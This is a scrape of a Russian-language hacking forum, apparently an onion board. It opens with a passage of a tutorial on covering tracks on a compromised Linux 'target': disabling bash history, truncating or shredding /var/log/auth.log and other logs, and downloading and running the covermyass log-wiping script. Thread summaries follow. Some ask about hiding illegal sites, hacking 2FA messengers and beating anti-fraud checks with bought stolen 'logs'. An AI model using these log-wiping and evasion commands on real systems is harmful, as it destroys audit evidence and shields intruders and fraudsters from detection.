Code:Copy to clipboard

root@target:/# echo $HISTFILE

Чтобы история команд не сохранялась, также можно ее отправить в /dev/null. Для этого установите переменную:

Code:Copy to clipboard

root@target:/# HISTFILE=/dev/null

Или сделайте то же самое с командой экспорта:

Code:Copy to clipboard

root@target:/# export HISTFILE=/dev/null

История теперь будет отправлена в /dev/null (то есть никуда):

Code:Copy to clipboard

root@target:/# echo $HISTFILE /dev/null

Установите количество команд, которые будут сохраняться во время текущего сеанса, равным 0, используя переменную HISTSIZE:

Code:Copy to clipboard

root@target:/# HISTSIZE=0

В качестве альтернативы используйте команду экспорта:

Code:Copy to clipboard

root@target:/# export HISTSIZE=0

Измените количество строк, разрешенных в файле истории, с помощью переменной HISTFILESIZE. Установите данное значение на 0:

Code:Copy to clipboard

root@target:/# HISTFILESIZE=0

Или с экспортом:

Code:Copy to clipboard

root@target:/# export HISTFILESIZE=0

Для изменения параметров оболочки также можно использовать команду set. Чтобы отключить опцию истории, используйте следующую команду:

Code:Copy to clipboard

root@target:/# set +o history

Снова включите ее:

Code:Copy to clipboard

root@target:/# set -o history

Точно так же для изменения параметров оболочки можно использовать команду shopt. Чтобы отключить историю, используйте следующую команду:

Code:Copy to clipboard

root@target:/# shopt -ou history

Снова включите ее:

Code:Copy to clipboard

root@target:/# shopt -os history

Во время выполнения команд на целевой системе иногда получается избежать их сохранения в истории, запустив команду с начального пробела:

Code:Copy to clipboard

root@target:~# cat /etc/passwd

Данный метод работает не всегда и зависит от системы. Также можно просто очистить историю с помощью переключателя -c :

Code:Copy to clipboard

root@target:~# history -c

Чтобы убедиться, что изменения записаны на диск, используйте переключатель -w :

Code:Copy to clipboard

root@target:~# history -w

Данные действия очистят историю только для текущего сеанса. Чтобы окончательно убедиться, что история очищается при выходе из сеанса, пригодится следующая команда:

Code:Copy to clipboard

root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

Также можно использовать команду kill для выхода из сеанса без сохранения истории:

Code:Copy to clipboard

root@target:/# kill -9 $$

Очистка файла журнала

В дополнение к истории Bash также требуется почистить логи, чтобы оставаться незамеченными. Вот некоторые общие файлы журналов и их содержимое:

/var/log/auth.log Аутентификация

/var/log/cron.log Cron задачи

/var/log/maillog Почта

/var/log/httpd Apache

Конечно, можно просто удалить журнал с помощью командыrm :

Code:Copy to clipboard

root@target:/# rm /var/log/auth.log

Но скорее всего, данная процедура вызовет многочисленные красные флажки. Поэтому лучше сделать файл пустым, чем стирать его полностью. Используем команду truncate , чтобы уменьшить размер файла до 0:

Code:Copy to clipboard

root@target:/# truncate -s 0 /var/log/auth.log

Обратите внимание, функция усечения присутствует не всегда и не во всех системах.

То же самое можно сделать, отображая в файл “ничего”:

Code:Copy to clipboard

root@target:/# echo '' > /var/log/auth.log

А также использовать** >** сам по себе для очистки файла:

Code:Copy to clipboard

root@target:/# > /var/log/auth.log

Мы также можем отправить его в /dev/null:

Code:Copy to clipboard

root@target:/# cat /dev/null > /var/log/auth.log

Или использовать команду tee :

Code:Copy to clipboard

root@target:/# true | tee /var/log/auth.log

Также можно использовать команду dd , чтобы ничего не записывать в файл журнала:

Code:Copy to clipboard

root@target:/# dd if=/dev/null of=/var/log/auth.log 0+0 records in 0+0 records out 0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

Команда shred может быть использована, чтобы поверх перезаписать файл с бессмысленными двоичными данными:

Code:Copy to clipboard

root@target:/# shred /var/log/auth.log

Дополнительно добавив -zu , вы обрежете файл и перезапишете его нулями:

Code:Copy to clipboard

root@target:/# shred -zu /var/log/auth.log

Скрипт Covermyass

Скрипт Covermyass автоматизирует процессы, рассмотренные нами ранее, включая очистку файлов журнала и отключение истории Bash.

Code:Copy to clipboard

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Перейдите в каталог с возможностью записи и используйте chmod, чтобы сделать его исполняемым:

Code:Copy to clipboard

root@target:/tmp# chmod +x covermyass

Затем запустите его:

Code:Copy to clipboard

root@target:/tmp# ./covermyass Welcome to Cover my ass tool ! Select an option : 1) Clear logs for user root 2) Permenently disable auth & bash history 3) Restore settings to default 99) Exit tool

Нам предоставляется настраиваемая подсказка с несколькими вариантами на выбор. Выберем первый, чтобы очистить логи:

Code:Copy to clipboard

> 1 [+] /var/log/messages cleaned. [+] /var/log/auth.log cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.

Также можно отключить Bash и историю авторизации с помощью опции 2:

Code:Copy to clipboard

> 2 [+] Permanently sending /var/log/auth.log to /dev/null [+] Permanently sending bash_history to /dev/null [+] Set HISTFILESIZE & HISTSIZE to 0 [+] Disabled history library Permenently disabled bash log.

Если вам нужно срочно все очистить, просто добавьте в команду now :

Code:Copy to clipboard

root@target:/tmp# ./covermyass now

Code:Copy to clipboard

[+] /var/log/messages cleaned. [+] /var/log/kern.log cleaned. [+] /var/log/wtmp cleaned. [+] ~/.bash_history cleaned. [+] History file deleted. Reminder: your need to reload the session to see effects. Type exit to do so.

автор @DRD_, Cyber Weapons Lab

Флюшка или прокладка прокси - что эффективнее?

ID: 676533bbb4103b69df371be3
Thread ID: 52403
Created: 2021-06-01T21:03:12+0000
Last Post: 2021-06-13T16:41:47+0000
Author: Calve
Replies: 7 Views: 1K

Господа, подскажите кто в теме сокрытия своих сайтов - что на практике будет эффективнее - флюшка или прокладка к серваку из динамических прокси?
И тут же вопросы:
Флюшки то тоже разные - бывает пишут флюшка все дела - а на практике ничего там от флюшки нет, или как их отличать и понять где реальная флюшка а где фуфло?
По прокси вопрос: если делать путь к сайту в виде прокси-прокладок - скажем с уникальными посетителями в 5к человек в сутки - сколько потоков на тарифе прокси будет достаточно, или каково их должно быть количество в пуле у арендуемого сервиса что бы работа сайта была приемлимой? Будет ли разница в скорости между и эффективности между дц прокси и резидентными к примеру?
Спасибо за ответы

Реально ли взломать любые мессенджеры с 2фа?

ID: 676533bbb4103b69df371be4
Thread ID: 50504
Created: 2021-04-09T17:57:29+0000
Last Post: 2021-06-12T22:47:21+0000
Author: user1011
Replies: 6 Views: 1K

Много где пишут, что взламывают соц.сети и мессенджеры с 2фа, и стоит огромных денег, но чувство такое что в 95% случаев тебя кинут, так реально ли это сделать без доступа к сим и телефону?подскажите кто опытный, заранее спасибо

Безопасность patreon

ID: 676533bbb4103b69df371bf9
Thread ID: 43079
Created: 2020-10-09T21:06:26+0000
Last Post: 2021-05-18T16:57:00+0000
Author: tipokipocod
Replies: 5 Views: 1K

Если сравнивать этот сервис и какой то donationalerts (мейл ру). Является ли патреон достаточно безопасным? Для обычного юзера

[Раздача] 6-month keepsolid vpn unlimited account

ID: 676533bbb4103b69df371bfb
Thread ID: 45481
Created: 2020-12-13T09:52:50+0000
Last Post: 2021-05-13T12:05:53+0000
Author: Kohan
Replies: 1 Views: 1K

поддерживает Wireguard

создаем новый ID https://id.keepsolid.com/signup

в личном кабинете в разделе Redeem a Code вставляем код:

Hidden content for authorized users.

VPNUNLIMITED2020CHIP

Hidden content for authorized users.

P.S. помнить, что сам сервис от украинских товарищей

российских серверов нет, есть Белоруссия
из практических есть Кипр, Индия

скорость прыгает в разное время суток, сервера, чем дальше от СНГ (помимо экзотик типа Южной Африки, Японии - Вьетнама, Бразилии), тем стабильнее,
США центр работает отлично

Digital Forensics - Complete Digital Forensics Masterclass (2021)

ID: 676533bbb4103b69df371bfe
Thread ID: 51666
Created: 2021-05-12T10:49:25+0000
Last Post: 2021-05-12T10:49:25+0000
Author: x00c4sub
Prefix: Видео
Replies: 0 Views: 1K

Most comprehensive Digital Forensics Course, You will learn Depth understanding of how computers work and how to do digital forensics.

CloudFlare - панацея?

ID: 676533bbb4103b69df371c06
Thread ID: 50755
Created: 2021-04-17T20:42:35+0000
Last Post: 2021-04-22T05:46:22+0000
Author: Dexter DeShawn
Replies: 10 Views: 1K

Наткнулся тут на ру-сайтик по продаже курива (бошки, гашиш), сайт находится в clear-нете и имеет SSL-сертификат от CloudFlare.
Поизучал домен, зареган более 2-х лет назад, все айпишники естественно ведут на сервера CloudFlare.
Ранее я уже обращал внимание на различные теневые сайты спокойно работающие по ру, находящиеся в clear-нете не один год и почти все имели апишники CloudFlare.
Проверку домена делал на pr-cy.ru
Я знаю, что можно получить бесплатный SSL-сертификат от CloudFlare, я уже это делал для нескольких своих белых сайтов.

Следовательно у меня возник вопрос:
Получение SSL-сертификата от CloudFlare автоматически меняет айпишник твоего сайта и я так понимаю, что это в какой-то степени затрудняет что-ли поиск серверов этих нелегальных ру-сайтиков?

Проброс сообщений и звонков через VOIP

ID: 676533bbb4103b69df371c07
Thread ID: 50637
Created: 2021-04-14T11:59:35+0000
Last Post: 2021-04-21T15:26:40+0000
Author: dort
Replies: 7 Views: 1K

Интересует такой вопрос:
Можно ли пробросить входящие и исходящие звонки, и SMS соощения через интернет?
Что-бы физически устройство с сим-картами находилось в одной точке, и этим устройством можно было управлять через сеть интернет из любого другого устройства, звонить, и принимать звонки и SMS. Сделать так сказать, "телефон - прокладку".

Я знаю, что это возможно, так как есть уже сервисы которые предоставляют такую услугу (по типу zadarma). Но меня не интересуют сервисы.
Меня интересует, есть ли техническая реализация, которую можно сделать дома на коленке? Например с помощью android смартфона и ADB.
Или я давно где-то читал, о подобной реализации с помощью Raspberry pi и gsm донгла, но к сожалению не могу найти информацию по этой теме.

Если кто-нибудь сталкивался с подобным материалом, буду признателен за ссылку.

Посоветуйте хороший антивирус

ID: 676533bbb4103b69df371c0b
Thread ID: 50503
Created: 2021-04-09T17:51:03+0000
Last Post: 2021-04-11T13:59:35+0000
Author: user1011
Replies: 15 Views: 1K

говорят Malwarebytes хороший, так ли это?какие есть лучше?

Вопрос по интифрод системе

ID: 676533bbb4103b69df371c14
Thread ID: 49782
Created: 2021-03-23T23:24:58+0000
Last Post: 2021-03-29T19:16:13+0000
Author: MAS0N
Replies: 8 Views: 1K

Приветствую всех, хотелось бы получить ответ по поводу того каким образом работают современные антифрод системы. Я понимаю что вопрос такой себе и точный ответ мне никто не даст, но все же хотя бы примерно.

Приведу пример, нужно мне сделать гугл клауд аккаунт. Я покупаю логи, антидетект браузер, а также резидентные прокси под зип, прокси чекаю на блек лист, пинг, наличие открытых портов и прочее. Куки использую свежие, систему настраиваю под лог до мелочей. Итог = первая попытка и все получается.Но затем, перенастроив все под новые логи, абсолютно каждая попытка сделать аккаунт — это провал.

Я уже голову сломал, с тем, каким образом работает фрод. Ведь если подождать пару дней, то аккаунт снова можно будет сделать, причем с первой попытки, но если дальше продолжать, то опять провал.

Буду рад услышать ваши мысли, советы и догадки, а также обсудить их. Думая тема интифрода — это вечная тема

[Мефодий Келевра] Максимальный параноик v.2 (2021)

ID: 676533bbb4103b69df371c15
Thread ID: 49950
Created: 2021-03-28T00:27:10+0000
Last Post: 2021-03-28T07:12:01+0000
Author: balabashka
Replies: 3 Views: 1K

Название: Максимальный параноик v.2 (2021)

Автор: Мефодий Келевра

Чему вы научитесь
Оставаться анонимными в сети
Освоим Kodachi как базовую рабочую систему
Два варианта установки Amnesia - вы закрыли крышку ноутбука, и результаты вышей работы достать нельзя.
Научимся прятать контейнеры внутри Amnesiac системы для большего комфорта работы не в ущерб безопасности.
Host Based - установим систему и настроим полностью анти форензик методы, включая красную кнопку для самоуничтожения.
Поднимем свой VPN для личных нужд и безопасности.
Поднимем свой дедик и безоасно настроим его, используя его как второе рабочее место, что бы все следы были там и не вели к Вам.
Для windows пользователей освоим Disk Cryptor с сумасшедшими методами анти брутфорса.
Так же научимся создавать Hidden OS в Vera Crypt. По одному паролю будет загрузка фейковой ОС, по второму скрытой, определить наличие фейковой ОС нельзя.

Требования
Базовое владение Linux системами

Описание
Привет друзья, Мефодий Келевра на связи!
И так встречайте, Maximum Paranoid v.2
Курс для тех кто ценит свои безопасность и конфеденциальность на максимальном уровне.
Будь то анонимная работа в сети, или же анти форензик экспертиза.

Курс ориентирован для тех кто знает зачем ему нужен максимальный уровень безопасности, конфиденциальности, при этом я максимально сконцентировался на комфорте полученного результата. Так что бы уровень безопасности, не шел в разрез с удобством пребывания внутри полученного, не побоюсь слова "Комплекса".

Можно сказать что данный курс, это логическое продолжение курса "За тобой не прийдут с болгаркой"

Чему мы научимся?

Освоим Kodachi как базовую рабочую систему
Два варианта установки Amnesia - вы закрыли крышку ноутбука, и результаты вышей работы достать нельзя
Научимся прятать контейнеры внутри Amnesiac системы для большего комфорта работы не в ущерб безопасности
Host Based - установим систему и настроим полностью анти форензик методы, включая красную кнопку для самоуничтожения
Поднимем свой VPN для личных нужд и безопасности
Поднимем свой дедик и безоасно настроим его, используя его как второе рабочее место, что бы все следы были там и не вели к Вам.
Для windows пользователей освоим Disk Cryptor с сумасшедшими методами анти брутфорса.
Так же научимся создавать Hidden OS в Vera Crypt. По одному паролю будет загрузка фейковой ОС, по второму скрытой, определить наличие фейковой ОС нельзя.

Исходник

Скачать

Нужен брандмауер приложений под Linux.

ID: 676533bbb4103b69df371c1b
Thread ID: 49625
Created: 2021-03-20T01:38:07+0000
Last Post: 2021-03-20T10:22:06+0000
Author: Samorez
Replies: 1 Views: 1K

Как Разрешить/Запретить доступ к интернету определённой программе в Linux? Не по ip или порту, а например разрешать firefox исходящий трафик в сеть.

Выбор хостовой ОС(производительность, безопасность) для запуска виртуальной машины

ID: 676533bbb4103b69df371c1c
Thread ID: 49288
Created: 2021-03-13T14:01:00+0000
Last Post: 2021-03-18T19:52:55+0000
Author: Neils
Replies: 4 Views: 1K

Какую лучше выбрать хоствую ОС для запуска виртуальной машины?
С минимальным потреблением оперативы и легкую по весу, так как ни красивый десктоп, ни приложения из коробки на хост ОС мне не нужны.
Желательно что бы не отправляла никаких запросов в интернет, по типу проверки обновлений, или что бы это можно было отключить.

Как создать цепочку VPN+TOR+VPN, но с VPN на виртулках?

ID: 676533bbb4103b69df371c23
Thread ID: 49147
Created: 2021-03-09T20:52:54+0000
Last Post: 2021-03-10T21:02:45+0000
Author: qbs
Replies: 1 Views: 1K

Здравствуйте!
Тор в этой цепочке - Whonix Gateway. Workstation - рабочая винда, которая на данный момент просто берет интернет через Whonix, то есть трафик идет только через тор.
Знаю, что впн можно просто запустить на хост машине и на workstation, но не хочу ставить впн ни на хостовую ос, ни на рабочую.
Хочу запускать и впн, и тор, и второй впн в виртуалках-роутерах, что бы трафик шел из Workstation -> VPN2 VM -> Whonix Gateway -> VPN1 VM -> Nat.
Как это можно сделать, выдать интернет VPN'a в другую виртуалку?
Нашел эту статью http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/44758/, статья прекрасная, но не понятно как из одной вм прокинуть интернет в другую с дополнительным впн/тором/...
Заранее спасибо!

Где купить дедик GNU/Linux с поддержкой GUI?

ID: 676533bbb4103b69df371c25
Thread ID: 48992
Created: 2021-03-05T19:37:42+0000
Last Post: 2021-03-10T06:31:05+0000
Author: Konovim
Replies: 6 Views: 1K

Желательно в стране, которая не входит в альянс 14 глаз.
Оплата: Monero, Dash, BTC.
Гарант!

Также, в розыске прокси. ( С такими же параметрами )

How Cybersecurity Really Works Early Release

ID: 676533bbb4103b69df371c26
Thread ID: 49058
Created: 2021-03-07T20:15:26+0000
Last Post: 2021-03-07T20:15:26+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Cybersecurity for Beginners is an engaging introduction to the field of cybersecurity. You’ll learn how attackers operate, as well as how to defend yourself and organizations against online attacks.
You don’t need a technical background to understand core cybersecurity concepts and their practical applications – all you need is this book. It covers all the important stuff and leaves out the jargon, giving you a broad view of how specific attacks work and common methods used by online adversaries, as well as the controls and strategies you can use to defend against them.
Each chapter tackles a new topic from the ground up, such as malware or social engineering, with easy-to-grasp explanations of the technology at play and relatable, real-world examples. Hands-on exercises then turn the conceptual knowledge you’ve gained into cyber-savvy skills that will make you safer at work and at home. You’ll explore various types of authentication (and how they can be broken), ways to prevent infections from different types of malware, like worms and viruses, and methods for protecting your cloud accounts from adversaries who target web apps.
You’ll also learn how to:

Use command-line tools to see information about your computer and network

Analyze email headers to detect phishing attempts

Open potentially malicious documents in a sandbox to safely see what they do

Set up your operating system accounts, firewalls, and router to protect your network

Perform a SQL injection attack by targeting an intentionally vulnerable website

Encrypt and hash your files

In addition, you’ll get an inside look at the roles and responsibilities of security professionals, see how an attack works from a cybercriminal’s viewpoint, and get first-hand experience implementing sophisticated cybersecurity measures on your own devices.

[ How Cybersecurity Really Works Early Release.pdf

](https://cloud.mail.ru/public/GpQc/VdMUuEcNA)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Torrent: A secure way for sharing

ID: 676533bbb4103b69df371c29
Thread ID: 47927
Created: 2021-02-11T06:19:11+0000
Last Post: 2021-03-03T12:14:34+0000
Author: gibbon
Replies: 6 Views: 1K

Many shared downloads are available as torrent file or magnetic link.
A lot of downloads will be monitored by justice.
What's the best solution to protect yourself by using your torrent client, VPN, Proxychain, Tor anything else?
And which torrent client is the best for Linux?

Безопасность в CloudFlare

ID: 676533bbb4103b69df371c2b
Thread ID: 48739
Created: 2021-02-28T09:47:47+0000
Last Post: 2021-03-01T09:52:57+0000
Author: X-Shar
Replies: 7 Views: 1K

Всем привет !

Часто вижу как на хакерских форумах идет прокси через сервис CloudFlare.

Всё хорошо, но почему такое доверие к этому сервису ?

Что такое проксирование ?

По факту весь трафик с сайта, в частности все ваши посты, сессии и пароли идут через это сервис **в расшифрованном виде...)
Т.е. по факту владельцы CloudFlare могут узнать ваши пароли, и в режиме "на лету" читать ваши переписки, заходить на форум под вашим никнеймом, сохранив например вашу текущую сессию сайта.

Почему при проксировании данные идут в расшифрованном виде ?**

Чтобы правильно кешировать и фильтровать контент, серверы CloudFlare должны иметь возможность видеть расшифрованный HTTP трафик. Для этого они всегда работают в режиме MiTM (Man-in-the-middle), подставляя конечному посетителю сайта свой SSL-сертификат.

Картинки в инструкциях по настройке HTTPS могут вводить в заблуждение, будто в режиме Full, на всем пути следования трафика используется шифрование. На самом деле сервер CloudFlare расшифровывает трафик от сервера и шифрует его заново своим сертификатом уже для посетителя сайта.

Даже если вы имеете на своей стороне действующий SSL-сертификат, CloudFlare все равно будет иметь доступ ко всем передаваемым данным. Это дискредитирует всю идею SSL, которая предполагает шифрование от клиента до конечного сервера без расшифровки по пути.

Также нужно иметь в виду, что спецслужбы той страны, в юрисдикции которой работает компания Cloudflare Inc, могут запрашивать доступ к расшифрованному трафику, даже если оригинальный сервер находится в другой юрисдикции. **Это превращает основную идею SSL в фикцию.

_Короче интересно мнение форумчан, кто-что думает ?

Это паранойя, или нет ?

Ведь во первых сам сервис CloudFlare могут взломать и тогда будут скомпрометировано куча форумов, а во вторых сам сервис Американский, те-же спец. службы могут сохранять все ваши действия на сайте в режиме онлайн.)))

Ну и в третьих, кто вообще знает какие логи и данные этот сервис вообще хранит.

Одно дело проксировать статический сайт, а другое форум или сервис.

Всем добра !)))_**

Как надёжно спрятать TOR-сервер с проектом?

ID: 676533bbb4103b69df371c2e
Thread ID: 48403
Created: 2021-02-20T17:11:21+0000
Last Post: 2021-02-26T17:49:23+0000
Author: Shelby
Replies: 17 Views: 1K

Кто-нибудь сможет подсказать, как максимально надёжно спрятать тор-сервер с проектом на борту?

На данный момент работает следующая связка:
Реальный комп с VPN --> Виртуалка с TOR-сервером на борту

Слышал, что когда досят onion-домен после отказа сервера в url-строке высвечивается реальный ip-адрес, т.е. при моей связке высветится ip VPN.
На сколько эта история реальна и как надёжно спрятать свой проект в торе и не засветиться?

Отличие .onion сайта от обычного сайта

ID: 676533bbb4103b69df371c31
Thread ID: 48611
Created: 2021-02-25T09:51:02+0000
Last Post: 2021-02-26T07:26:10+0000
Author: 0x2d4_a8
Replies: 12 Views: 1K

Чем отличается сайт в сети тор с доменом .onion от обычного сайта?
Предоставляет ли этот сайт бОльшую защиту для самого сайта, для клиента?
Возможно ли получить IP адрес или любую информацию которая может помочь в поиске сервера, хостера?
В тор браузере при подключении к .onion сайту в цепочке появляется три дополнительных Relay, что это такое?
Где можно больше прочитать о .onion сайтах и об их реализации?

Ubuntu linux bible 10th

ID: 676533bbb4103b69df371c36
Thread ID: 48406
Created: 2021-02-20T18:25:17+0000
Last Post: 2021-02-20T18:25:17+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Ubuntu Linux Bible (covering Ubuntu version 20.04) gives you what you need to successfully plan and implement Ubuntu workloads at any level and addressing all use-cases. Whether you’re a desktop user, server administrator, or completely new to Linux, you’re covered. The book presents the information so that new users get all of the information that they need, while allowing experienced Linux users the freedom to skip directly to the specific details they require. The book covers the recently released 20.04 Long Term Support version of Ubuntu, as well as previous versions.
The book is organized into four parts: “Getting Started with Ubuntu Linux,” “Ubuntu for Desktop Users,” Ubuntu for System Administrators,” and “Configuring Servers on Ubuntu.”
You’ll learn about fundamental Linux system administration topics such as creating and managing users, backing up the system, adding new printers and disks to the system, network configuration, and using Ubuntu wirelessly.
Ubuntu is known for its many hundreds of thousands of happy desktop users. But it can also be used in an enterprise environment to provide core network and infrastructure services.

[ ubuntu-linux-bible-10th.pdf

](https://cloud.mail.ru/public/ViCr/3dvPXEJ2J)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Linux security fundamentals

ID: 676533bbb4103b69df371c37
Thread ID: 48405
Created: 2021-02-20T18:24:10+0000
Last Post: 2021-02-20T18:24:10+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Understanding Linux Security is essential for administration professionals. Linux Security Fundamentals covers all the IT security basics to help active and aspiring admins respond successfully to the modern threat landscape. You’ll improve your ability to combat major security threats against computer systems, networks, and services. You’ll discover how to prevent and mitigate attacks against personal devices and how to encrypt secure data transfers through networks, storage devices, or the cloud. Linux Security Fundamentals teaches:

Using Digital Resources Responsibly

What Vulnerabilities and Threats Are

Controlling Access to Your Assets

Controlling Network Connections

Encrypting Data, Whether at Rest or Moving

Risk Assessment

Configuring System Backups and Monitoring

Resource Isolation Design Patterns

[ linux-security-fundamentals.pdf

](https://cloud.mail.ru/public/PKWZ/dmCYZttz8)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Practical iot hacking attacking

ID: 676533bbb4103b69df371c38
Thread ID: 48404
Created: 2021-02-20T17:54:16+0000
Last Post: 2021-02-20T17:54:16+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

The definitive guide to hacking the world of the Internet of Things (IoT) — Internet connected devices such as medical devices, home assistants, smart home appliances and more. Drawing from the real-life exploits of five highly regarded IoT security researchers, Practical IoT Hacking teaches you how to test IoT systems, devices, and protocols to mitigate risk. The book begins by walking you through common threats and a threat modeling framework. You’ll develop a security testing methodology, discover the art of passive reconnaissance, and assess security on all layers of an IoT system. Next, you’ll perform VLAN hopping, crack MQTT authentication, abuse UPnP, develop an mDNS poisoner, and craft WS-Discovery attacks. You’ll tackle both hardware hacking and radio hacking, with in-depth coverage of attacks against embedded IoT devices and RFID systems.

[ practical-iot-hacking-attacking.epub

](https://cloud.mail.ru/public/QUp1/noZQbWDeX)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Создаём свой собственный анонимный Socks5, или личная непубличная нода в Tor

ID: 676533bbb4103b69df371c3b
Thread ID: 48306
Created: 2021-02-18T17:38:52+0000
Last Post: 2021-02-18T17:46:48+0000
Author: top
Prefix: Статья
Replies: 2 Views: 1K

Создаём свой собственный анонимный Socks5, или личная не публичная нода в Tor !

Преимущества:
- Шифрование трафика
- Socks Работает за Nat

Удаленный компьютер.
На удаленном компьютере запускаем NAT Tor Socks.

После запуска мы получим Socks вида

User:Pass@hkpjz3d3qpxhq4dc.onion:10028
или hkpjz3d3qpxhq4dc.onion:10028 (если не используем Login:password)

Все ! теперь нам нужно только подключиться к данному Socks5

Подключение к удаленному серверу

Запускаем Double SSH Tunnel Manager
добавляем и добавляем Socks User:Pass@hkpjz3d3qpxhq4dc.onion:10028
Run Socks

На этом все !

Ответы на вопросы.

Как его можно использовать в Torbrowser
- зайдите в настройки подключения Torbrowser и подключите Socks 127.0.0.1:10200

Какие еще настройки у NAT Tor Socks?

Можно пробросить любой Socks5,

Автор @sshmanager

Cyber Strategy Risk-Driven Security and Resiliency

ID: 676533bbb4103b69df371c3f
Thread ID: 48094
Created: 2021-02-14T10:52:26+0000
Last Post: 2021-02-14T10:52:26+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

Cyber Strategy: Risk-Driven Security and Resiliency provides a process and roadmap for any company to develop its unified Cybersecurity and Cyber Resiliency strategies. It demonstrates a methodology for companies to combine their disassociated efforts into one corporate plan with buy-in from senior management that will efficiently utilize resources, target high risk threats, and evaluate risk assessment methodologies and the efficacy of resultant risk mitigations. The book discusses all the steps required from conception of the plan from preplanning (mission/vision, principles, strategic objectives, new initiatives derivation), project management directives, cyber threat and vulnerability analysis, cyber risk and controls assessment to reporting and measurement techniques for plan success and overall strategic plan performance. In addition, a methodology is presented to aid in new initiative selection for the following year by identifying all relevant inputs.

[ Cyber Strategy Risk-Driven Security and Resiliency.pdf

](https://cloud.mail.ru/public/kesB/ctBthgPo6)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Как деанонят пользователей спутниого интернета?

ID: 676533bbb4103b69df371c40
Thread ID: 47948
Created: 2021-02-11T14:29:18+0000
Last Post: 2021-02-14T07:25:47+0000
Author: KAJIT
Replies: 9 Views: 1K

Здравствуйте, собственно вопросу уже задан в теме. Если Вам известно как вычисляют местонахождение точки приемо-передатчика сигнала на спутник расскажите пожалуйста. Может кто то знает извесные кейсы-приемок федералами юзеров спутникого канала связи. Спасибо.

анонимность в вотсаппе?

ID: 676533bbb4103b69df371c41
Thread ID: 46898
Created: 2021-01-17T13:57:02+0000
Last Post: 2021-02-13T14:08:52+0000
Author: d_qu
Replies: 9 Views: 1K

Как обезопасить себя используя вотсап? Пока единственное что приходит на ум так это поставить нокс на деда, есть ли еще какие-либо варианты?

Анонимные сервисы

ID: 676533bbb4103b69df371c43
Thread ID: 46443
Created: 2021-01-07T21:26:39+0000
Last Post: 2021-02-12T19:07:37+0000
Author: tipokipocod
Replies: 8 Views: 1K

Анонимные сервисы для ютюба,серфинга?

Understanding Network Hacks Attack and Defense with Python 3 2nd Edition

ID: 676533bbb4103b69df371c45
Thread ID: 47695
Created: 2021-02-05T22:17:10+0000
Last Post: 2021-02-08T22:30:54+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 1 Views: 1K

This book addresses interested Python programmers who want to learn about network coding and to administrators, who want to actively check the security of their systems and networks. The content should also be useful for white, gray and black hat hackers, who prefer Python for coding, as well as for curious computer users, who want to get their hands on practical IT security and are interested in learning to see their network through the eyes of an attacker.

[ Understanding Network Hacks Attack and Defense with Python 3.pdf

](https://cloud.mail.ru/public/z3sP/NyjdsA4T9)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

Кибероружие и кибербезопасность. О сложных вещах простыми словами

ID: 676533bbb4103b69df371c47
Thread ID: 47696
Created: 2021-02-05T22:30:10+0000
Last Post: 2021-02-05T22:30:10+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 1K

В книге вы найдете многочисленные примеры применения информационных атак, а также наиболее эффективные методы защиты от их воздействия. В доступной форме изложены теоретические основы информационной безопасности и базовые технологии защиты информации. Подробно описаны характеристики технологических платформ кибератак и применение их на различных устройствах.

[ Кибероружие_и_кибербезопасность_О_сложных_вещах_простыми_словами.pdf

](https://cloud.mail.ru/public/6525/V5F6UgP2u)

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail

cloud.mail.ru

[Udemy] [Виктор Черемных] Кибербезопасность (2020)

ID: 676533bbb4103b69df371c49
Thread ID: 47596
Created: 2021-02-03T17:21:47+0000
Last Post: 2021-02-03T21:25:27+0000
Author: DikTor
Prefix: Мануал/Книга
Replies: 1 Views: 1K

Автор: Виктор Черемных [Udemy]
Название: Кибербезопасность (2020)

Описание:

Понятие кибербезопасности подразумевает под собой совокупность методов, технологий и процессов, предназначенных для защиты целостности сетей, программ и данных от цифровых атак. Целью кибератак является получение несанкционированного доступа к конфиденциальной информации ее копирование, изменения или уничтожение. Так же могут служить для вымогательства денежный средств у пользователей или нарушения рабочих процессов в компании.

Кибербезопасность может также упоминаться, как компьютерная безопасность или безопасность информационных технологий.

Киберугрозы могут иметь различные формы, основные из них:

Вредоносные программы (Вид ПО, предназначенный для получения несанкционированного доступа к конфиденциальной информации или нанесения ущерба компьютеру, данным);

Социальная инженерия (Методы, которые злоумышленники могут применять, чтобы обмануть человека, с целью получения конфиденциальной информации или несанкционированного доступа к системе информационных технологий);

Фишинг (Это одна из самых популярных техник кибератаки, которая заключается, в основном, в обмане пользователя путем отправки поддельных электронных писем).

Вирусы-вымогатели (Основная задача такого программного обеспечения – вымогательство денежных средств, которое осуществляется шифрованием и блокированием доступа к данным или компьютерной системе, в целом, до тех пор, пока выкуп не будет выплачен. В случае выплаты выкупа нет 100% гарантии, что данные и система будет восстановленые в исходное состояние).

Для кого этот курс:

Начинающие пользователи

Требования:

Умение работать за компьютером

Понимание работы операционной системы

Чему вы научитесь:

Linux

SSH

Zabbix

Docker

nginx

iptables

wireshark

SNMP

PuTTY

netcat

nmap

Spoiler: Пароль к архиву:

Пароль к архиву: infovirus.biz

> Продажник

> Скачать

Как бороться с капчей в тор?

ID: 676533bbb4103b69df371c4b
Thread ID: 47504
Created: 2021-02-01T18:16:12+0000
Last Post: 2021-02-01T20:10:51+0000
Author: web
Replies: 11 Views: 1K

